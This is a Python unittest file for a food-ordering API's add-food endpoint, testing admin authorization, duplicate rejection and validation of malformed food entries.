class TestCase(BaseTestCase):
"The test Class for the add_food feature"
def test_empty_menu_list(self):
"asserting menu list is empty"
self.assertEqual(len(order_obj.get_all_foods()), 0)
def test_add_food(self):
food = {
"food_name": "fish",
"food_price": 22
}
#invalid key
invalid_food_obj = {
"food": "fish",
"food_price": 22
}
#invalid food_price data type
invalid_food_input = {
"food_name": "fish",
"food_price": "gg"
}
#invalid food name
invalid_food_input1 = {
"food_name": 2,
"food_price": "gg"
}
#empty food name
invalid_food_input2 = {
"food_name": "",
"food_price": "gg"
}
#food name with character
invalid_food_input3 = {
"food_name": "fish",
"food_price": 5
}
#test admin can add food
self.register_user(self.new_user)
#before user is admin
resp6 = self.login_user(self.resgistered_user)
print("this " + str( resp6))
token = str(resp6.json["token"])
resp7 = self.post_food(food, token)
self.assertEqual(resp7.status_code, 401)
#after user becomes admin
self.make_admin("mos")
resp = self.login_user(self.resgistered_user)
token = str(resp.json["token"])
resp1 = self.post_food(food ,token)
self.assertEqual(resp1.status_code, 201)
#test duplicate food
resp2 = self.post_food(food, token)
self.assertEqual(resp2.status_code, 409)
#test post invalid food
resp3 = self.post_food(invalid_food_obj, token)
self.assertEqual(resp3.status_code, 400)
# test post invalid food input
resp4 = self.post_food(invalid_food_input, token)
self.assertEqual(resp4.status_code, 400)
# test post invalid food input
resp5 = self.post_food(invalid_food_input1, token)
self.assertEqual(resp5.status_code, 400)
# test post invalid food input
resp6 = self.post_food(invalid_food_input2, token)
self.assertEqual(resp6.status_code, 400)
if __name__ == "__main__":
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.